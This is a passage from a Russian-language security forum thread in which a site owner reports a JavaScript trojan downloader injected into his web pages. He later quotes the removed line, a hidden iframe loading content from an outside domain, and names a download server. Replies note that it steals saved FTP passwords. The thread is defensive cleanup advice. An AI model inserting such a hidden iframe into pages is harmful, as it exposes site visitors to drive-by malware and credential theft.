Показано с 1 по 5 из 5.

Trojan-Downloader.JS.Tabletka.a

  1. #1
    Junior Member Репутация
    Регистрация
    08.11.2007
    Сообщений
    10
    Вес репутации
    61

    Trojan-Downloader.JS.Tabletka.a

    Привет!
    Знаю правила форума, но вирус не у меня на компе, а на сайте bonus-poker.ru - без касперского НЕ ЗАХОДИТЬ!!!. Каспер определил его как Trojan-Downloader.JS.Tabletka.a - пытается закачать файлы с разных серверов. Вирус совсем молодой, был зафиксирован лабораторией касперского 22-го октября кажется, еще нет ни описаний ничего. Отправил им письмо, пока разбираются.

    В моем случае троян пытается качаться с сервера 0012.ff-freehosting.com/all/index.php//index

    Также заразился другой сайт, который находится у этого же хостера.

    Вот тут единственное, что нашел по этому поводу http://forum.kazandom.ru/index.php?s...0&#entry471414

    В конце кода страницы был подозрительный чужлй php-код на открытие страницы, но такой страницы у себя на хосте я не нашел. Удаление кода также не решило проблему. Ваша лаборатория может справится с такой зверюшкой до официальных релизов?
    Последний раз редактировалось V_Bond; 24.10.2008 в 21:03. Причина: активные ссылки

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.03.2008
    Сообщений
    14,832
    Вес репутации
    1808
    Спасибо за информацию, но увы свой лаборатории у нас нет

  4. #3
    Junior Member Репутация
    Регистрация
    08.11.2007
    Сообщений
    10
    Вес репутации
    61
    Решил проблему сам. В коде главных страниц обоих сайтов на этом хостере была найдена и удалена следующая строчка кода:

    <iframe src="http://thefilmmusic.cn/in" width=393 height=14 style="visibility: hidden"></iframe>

    Сменил пароли в панель и фтп-вход. После этого касперский перестал обнаруживать вирус.

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994
    Paradox, тему я перенёс. Больше в "помогите" такое не постить, иначе красную карточку подарю.

  6. #5
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.09.2007
    Сообщений
    584
    Вес репутации
    657
    Paradox, история стара как мир, данный скрипт пытается качать кучу разных эксплойтов, большинство из них заточены на хищение сохраненных паролей из разного рода файл и фтп менеджеров. так что проверять внимательно все компы с которых заходили в админку сайта. т.к. утечка произошла с них. и не факт что это не повторится.
    ЗЫ перестанте сохранять пароли в менеджерах, скуолько можно уже...

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 12.06.2009, 23:17
  2. Ответов: 4
    Последнее сообщение: 22.02.2009, 03:31
  3. как убрать Trojan.DownLoader.19241 и Trojan.MulDrop.5516
    От Dimin75 в разделе Помогите!
    Ответов: 15
    Последнее сообщение: 22.02.2009, 01:42
  4. Trojan-Downloader.JS.Tabletka.a на сайте
    От Paradox в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 25.10.2008, 16:15
  5. Ответов: 22
    Последнее сообщение: 22.05.2007, 11:54

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01025 seconds with 19 queries